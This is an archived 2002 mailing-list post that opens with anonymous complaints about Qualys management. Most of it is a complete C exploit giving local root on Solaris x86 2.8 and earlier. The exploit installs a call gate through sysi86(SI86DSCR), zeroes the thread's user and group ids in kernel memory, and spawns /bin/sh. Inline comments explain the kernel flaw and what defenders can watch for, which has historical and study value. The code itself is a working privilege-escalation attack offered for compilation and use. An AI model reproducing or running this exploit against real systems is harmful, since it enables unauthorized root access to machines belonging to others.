
cgate soli86


From: _hush_hush_ () hushmail com
Date: Wed, 9 Jan 2002 03:08:48 -0800



/*
 * 
 *  Team,
 *
 *  As Qualys took the opportunity to move forward to becoming a
 *  successful global company we would like to extend our condolences
 *  to the development team that suffered some collateral damage during
 *  the transition from a knowledge and friendship based company to
 *  a greedy and unhuman one.
 *
 *  Who is responsible for this?
 *
 *  tschuess
 *
 */


/*
 *
 *  Managers,
 *
 *  After firing the dev team, including founders of the company,
 *  all you have left behind is sadness in their hearts... and total
 *  incompetence in your circles.
 *
 *  Knowledge is power, but you do not have both.
 *
 */


/*
 *  solaris i86 <= 2.8 local root
 *
 *  gcc -Wall -O2 -fomit-frame-pointer -o callgate callgate.c
 *
 *  lsd-pl, too bad we did not join the argus challenge...
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <limits.h>
#include <time.h>
#include <errno.h>
#include <sys/cpuvar.h>
#include <sys/sysi86.h>
#include <sys/segment.h>

/*
 * getroot - target of the descriptor installed by main(); sets every id in
 * the current thread's credential structure to 0.
 *
 * main() stores this function's address in the descriptor and reaches it
 * with a far call (`lcall $7,$0`), not an ordinary C call, which is why the
 * body ends with a hand-written `lret` rather than the compiler's epilogue.
 * Presumably it then executes in the segment named by KCSSEL (the selector
 * main() places in the descriptor) -- confirm against <sys/segment.h>.
 *
 * NOTE(review): the build line in the file header asks for
 * -fomit-frame-pointer; presumably the stack layout expected by the final
 * `pop %ds; lret` depends on it.
 *
 * Defensive reading: nothing in this function is the flaw. It only works
 * because the kernel accepted the descriptor main() submits, so the fix
 * belongs in the code that validates that descriptor.
 */
void getroot(void)
{
        /* cpu stays NULL on purpose: it is dereferenced below while %ds holds
         * KGSSEL, so the access is relative to that segment rather than to the
         * process's data segment. */
        register cpu_t* cpu=NULL; /* magic ;-) */
        register kthread_id_t thread;
        register struct cred* cred;

        /* Save the caller's %ds on the stack, then load KGSSEL into %ds. */
        __asm__ __volatile__ ("pushl %%ds; pushl %0; popl %%ds;" : : "i" (KGSSEL));
        /* Offset-0 read through KGSSEL; presumably that segment is based at
         * the current CPU's cpu_t -- TODO confirm. */
        thread = cpu->cpu_thread;
        /* Switch %ds to KDSSEL so the pointers read next are followed through
         * that data segment. */
        __asm__ __volatile__ ("pushl %0; popl %%ds;" : : "i" (KDSSEL));
        cred = thread->t_cred;
        /* In-place overwrite of the effective, real and saved user and group
         * ids. Whether this cred structure is shared with other threads or
         * processes is not visible from this listing. */
        cred->cr_uid = 0;
        cred->cr_ruid = 0;
        cred->cr_suid = 0;
        cred->cr_gid = 0;
        cred->cr_rgid = 0;
        cred->cr_sgid = 0;
        /* Restore the %ds saved by the first asm statement and far-return to
         * the instruction after the lcall in main(). Single '%' because this
         * asm has no operands. */
        __asm__ __volatile__ ("pop %ds; lret;");
}

/*
 * main - asks the kernel to install one LDT descriptor via
 * sysi86(SI86DSCR), far-calls through it, then replaces the process with
 * /bin/sh.
 *
 * argc and argv are unused. Returns 0 on every path, including when the
 * sysi86() request is refused or execl() fails.
 *
 * Root cause, for defenders: per the file header this affects Solaris x86
 * <= 2.8. The request below only has an effect if the kernel accepts, from
 * an unprivileged caller, a descriptor whose access byte marks it as a gate
 * (system type, DPL 3) and whose selector field names KCSSEL. A fixed
 * SI86DSCR handler would reject system/gate descriptor types and any
 * non-user selector submitted by user processes. An unprivileged process
 * issuing sysi86(SI86DSCR) with such values is the observable event.
 */
int main(int argc, char *argv[])
{
        struct ssd ldt_arg;

        /* Descriptor fields as submitted to the kernel:
         *   bo   - address of getroot(), truncated to 32 bits by the cast
         *   ls   - KCSSEL
         *   acc1 - 0xEC = present, DPL 3, system descriptor, type 0xC
         *          (32-bit call gate in the x86 access-byte encoding)
         *   acc2 - 0
         *   sel  - 7 = LDT index 0, table-indicator bit set, RPL 3
         * NOTE(review): for a gate, bo and ls evidently act as target offset
         * and target selector -- confirm against the struct ssd definition in
         * <sys/sysi86.h>. */
        ldt_arg.bo = (unsigned int) getroot;
        ldt_arg.ls = KCSSEL;
        ldt_arg.acc1 = 0xEC;
        ldt_arg.acc2 = 0;
        ldt_arg.sel = 7;
        /* sysi86() returning 0 means the kernel accepted the descriptor. */
        if (!sysi86(SI86DSCR, &ldt_arg)) {
                /* Far call through selector 7; getroot() returns here with lret. */
                __asm__ __volatile__ ("lcall $7,$0");
                /* execl() only returns on failure; its result is not checked. */
                execl("/bin/sh", "/bin/sh", NULL);
        }
        return 0;
}



